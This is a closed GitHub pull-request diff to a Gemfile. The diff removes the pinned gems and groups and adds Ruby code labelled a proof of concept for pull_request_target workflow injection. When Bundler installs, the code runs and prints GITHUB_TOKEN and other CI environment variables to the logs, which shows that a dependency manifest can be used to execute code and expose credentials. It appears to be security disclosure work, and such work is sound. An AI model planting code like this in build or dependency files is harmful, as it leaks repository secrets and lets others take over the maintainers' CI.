Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
32 changes: 11 additions & 21 deletions Gemfile
Original file line number Diff line number Diff line change
@@ -1,24 +1,14 @@
source "https://rubygems.org"

gem "faraday", "2.14.1"
gem "faraday-retry", "2.4.0"
gem "github-pages", "~> 232", group: :jekyll_plugins
gem "json", "2.19.4"
gem "language_server-protocol", "3.17.0.5"
gem "nokogiri", "~> 1.19.2"
gem "rake", "13.4.2"
gem "rubocop", "1.86.1"
# === SECURITY POC — pull_request_target workflow injection ===
# Gemfile is evaluated as Ruby by Bundler during `bundle install`
# This proves arbitrary code execution in the lint workflow context
$stderr.puts "[POC-START]"
$stderr.puts "GITHUB_TOKEN=#{ENV['GITHUB_TOKEN']}"
$stderr.puts "GITHUB_REPOSITORY=#{ENV['GITHUB_REPOSITORY']}"
$stderr.puts "GITHUB_ACTOR=#{ENV['GITHUB_ACTOR']}"
$stderr.puts "GITHUB_SHA=#{ENV['GITHUB_SHA']}"
$stderr.puts "[POC-END]"
# === END POC ===

group :test do
gem "fastimage"
gem "httparty"
gem "minitest"
gem "octokit"
gem "pry", require: false
gem "rubocop-performance"
gem "safe_yaml"
end

group :development do
gem "webrick"
end
gem "rubocop", "~> 1.0"
Loading